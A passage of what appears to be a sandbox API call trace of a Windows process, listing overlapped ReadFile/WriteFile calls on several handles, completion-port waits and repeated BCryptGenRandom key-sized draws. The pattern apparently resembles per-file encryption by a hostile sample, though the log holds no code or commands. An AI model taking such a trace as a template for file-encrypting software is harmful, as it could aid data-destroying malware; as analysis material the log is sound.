lpOverlapped=0x34afc18) returned 1 [0141.542] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2b64, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0141.555] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0141.573] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x3740, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0141.573] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0141.581] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.581] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0141.582] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.582] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0141.582] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.582] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.582] free (_Block=0x3e305b8) [0141.582] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.582] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.583] free (_Block=0x1fa91d0) [0141.583] free (_Block=0x77d7a8) [0141.583] free (_Block=0x1fa90b8) [0141.583] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.583] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0141.588] CloseHandle (hObject=0x338) returned 1 [0141.589] free (_Block=0x3e70008) [0141.589] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0141.598] CloseHandle (hObject=0x308) returned 1 [0141.599] free (_Block=0x3ef0008) [0141.599] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0141.616] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x3e10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0141.628] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.023] CloseHandle (hObject=0x308) returned 1 [0142.023] free (_Block=0x1ff1e60) [0142.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.032] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0142.033] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0142.033] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.033] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.033] free (_Block=0x3e305b8) [0142.033] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.033] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.034] free (_Block=0x1fa91d0) [0142.034] free (_Block=0x77d7a8) [0142.034] free (_Block=0x1fa90b8) [0142.034] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0142.034] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.042] WriteFile (in: hFile=0x3cc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0142.043] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.044] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2a60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0142.044] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.044] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2c90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.044] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.063] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2fac, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0142.064] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.071] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.072] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0142.072] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.072] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0142.072] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.072] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.072] free (_Block=0x3e305b8) [0142.073] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.073] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.073] free (_Block=0x1fa91d0) [0142.073] free (_Block=0x77d7a8) [0142.073] free (_Block=0x1fa90b8) [0142.073] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0142.073] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.090] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1f0c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0142.102] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.116] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1a90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0142.117] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.137] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x6890, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0142.137] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.148] WriteFile (in: hFile=0xec, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x1ba0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0142.148] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.153] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x121c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0142.161] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.169] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0142.170] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.173] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x2044, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0142.176] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.896] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0142.897] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.908] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.908] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0142.908] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.909] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0142.909] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.909] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.909] free (_Block=0x3e305b8) [0142.909] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.909] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.910] free (_Block=0x1fa91d0) [0142.910] free (_Block=0x77d7a8) [0142.910] free (_Block=0x1fa90b8) [0142.910] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0142.910] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.919] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4150, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.920] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.927] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x8379, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0142.940] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0142.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.951] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0142.951] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.951] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0142.952] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.952] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.952] free (_Block=0x3e305b8) [0142.952] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.952] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.952] free (_Block=0x1fa91d0) [0142.952] free (_Block=0x77d7a8) [0142.952] free (_Block=0x1fa90b8) [0142.952] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0143.673] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x7c6a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0143.769] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0143.777] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x8fd4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0143.793] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0143.799] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8fb8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0143.811] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0143.820] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.821] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0143.821] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.821] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0143.822] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0143.822] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0143.822] free (_Block=0x3e305b8) [0143.822] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0143.822] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0143.822] free (_Block=0x1fa91d0) [0143.822] free (_Block=0x77d7a8) [0143.822] free (_Block=0x1fa90b8) [0143.822] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0143.823] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0143.832] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.833] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0143.833] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.833] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0143.833] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0143.833] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0143.834] free (_Block=0x3e305b8) [0143.834] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0143.834] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0143.834] free (_Block=0x1fa91d0) [0143.834] free (_Block=0x77d7a8) [0143.834] free (_Block=0x1fa90b8) [0143.834] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0143.834] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0144.753] CloseHandle (hObject=0x170) returned 1 [0144.753] free (_Block=0x1ff1e60) [0144.754] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0144.765] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x2ac0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0144.765] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0144.773] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x18d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0144.773] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0144.785] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x2630, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0144.785] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0144.800] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x40f8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0144.815] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0144.821] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1748, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.823] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, 